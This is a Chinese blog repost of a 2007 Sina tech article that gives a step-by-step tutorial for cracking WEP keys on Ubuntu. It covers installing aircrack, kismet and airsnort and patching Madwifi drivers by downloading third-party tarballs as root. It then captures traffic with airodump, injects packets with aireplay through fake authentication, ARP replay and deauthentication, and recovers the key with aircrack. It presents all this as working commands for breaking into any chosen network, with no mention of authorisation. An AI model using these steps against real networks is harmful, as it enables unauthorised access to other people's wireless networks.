2007年4月14日 星期六

秘笈揭露 Ubuntu破解WEP密鑰一點不費勁_軟件_科技時代_新浪網

秘笈揭露 Ubuntu破解WEP密鑰一點不費勁_軟件_科技時代_新浪網

看了這篇文章,任何人都可以安裝 和運行Linux,並破解WEP密鑰。我一共花了整整兩天,並閱讀了大量資料才做出這個東西,現在拿出來和大家分享。我不是Linux方面的專家。你所需 要的就是一個有無線網卡的舊筆記本和一份Ubuntu Linux的拷貝,這是目前最流行並且最易於安裝的Linux發行版本之一。

第一步,很顯然,是安裝Ubuntu。從CD啟動,按指示操作,非常簡單。要注意的是,接下來的每一步都要有序進行,否則就達不到預期目標。

下載Ubuntu LTS

下一步是安裝其它程序。首先要保證你的本本可以聯網。安裝其它程序,需要打開一個終端窗口,並鍵入如下代碼:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list

在編輯器中,用以下代碼代替其它東西:

## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

保存文件、退出編輯器。敲入如下命令:

sudo apt-get update

現在我們可以安裝後續將會用到的包了:

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

接下來你應該更新整個系統,方法是,進入系統菜單——>Administration——>Update Manager。單擊「Check」,開始安裝更新。然後重啟系統。完成後,為Madwifi驅動打補丁。

這個地方 可能會有點複雜。我的無線網卡(Linksys WPC55AG)用的是Atheros驅動,我需要對之打補丁。如果你的驅動和我的不同,你需要研究一下是否需要為驅動打補丁,是否甚至可以和 Aircrack套件協同工作。Aircrack-ng.org的論壇是一個用來測試的好地方,當然了,google search也是的。如果你的網卡也是Atheros的,我們稱之為ath0,那麼,在終端窗口敲入iwconfig,會出現一行字符,顯示以太網控制器 是Atheros Communications……

我們來打補丁。當發現硬盤舊的驅動時,會暫時讓你的無線網卡無法工作。先進入/usr/src目錄,下載新的驅動、刪掉老驅動,然後安裝新驅動,並打上補丁。你可以把以下代碼拷貝粘貼到終端:

sudo -i
cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name 『ath*』 -exec rm -v {} \;
find /lib/modules -name 『wlan*』 -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci

如果你用的是Atheros驅動,接下來我們舊需要配置kismet了。如果你用的是其它驅動,就必須看你所使用的語法。首先進入Kismet配置,然後改變源代碼行。

sudo gedit /etc/kismet/kismet.conf

把以「source=」打頭的代碼行變為「source=madwifi_ag,ath0,madwifi」,重啟計算機。重啟後你將可以通過無線網卡訪問英特網。

現在我們開始破解。打開一個終端窗口,進入監控模式,運行ksimet。

sudo airmon start ath0
sudo kismet

找到你想要破解的無線網絡,需要注意其ESSID和通道,然後敲Ctrl-C退出。

接下來運行airodump。

sudo airodump ath0 filename channel# 1

文件名隨你意,可以作為ivs文件存在你的home目錄下,或者存在你運行命令的任何目錄下。

從airodump 中拷貝無線網絡的bssid,具體做法是選中後敲Shift+Ctrl+C。打開一個新的終端窗口,以便我們可以運行aireplay,開始注入數據包, 導致數據量上升。我們想要airodump中的數據欄顯示在10萬到40萬之間。數據包越多,aircrack就可以越快地找到WEP密鑰。如果WEP密 鑰是128位的,我們可能需要多達100萬個數據包。

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

應該把網絡和無線連接聯繫起來。如果總是超時,你需要離無線路由器更近,或通過「sudo iwconfig ath0 rate 1M」改變接口速率。

接下來我們想開始注入數據包。

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

起初只是讀取數據包,並且報告0個ARP請求、發送0個數據包。只需要等一兩分鐘,就會開始大量發送數據包了。如果返回文本,並報告說已經被削弱了,那麼敲Ctrl+C,重新運行命令。可以通過敲入下面這條命令來加速任何事情:

sudo aireplay -0 ath0 -a BSSID ath0

否則就只坐等事情慢慢進行吧。隨著數據包開始被發送,Airodump中的數據欄就開始飆升。等到收到了預期數量的數據包,打開一個新的終端窗口,運行aircrack。

sudo aircrack filename.ivs

一分鐘後,aircrack應該返回WEP密鑰。如果沒有返回,那就繼續回收更多的數據包。

這做起來一點都不費勁,但可以起作用。

下載Ubuntu LTS

沒有留言: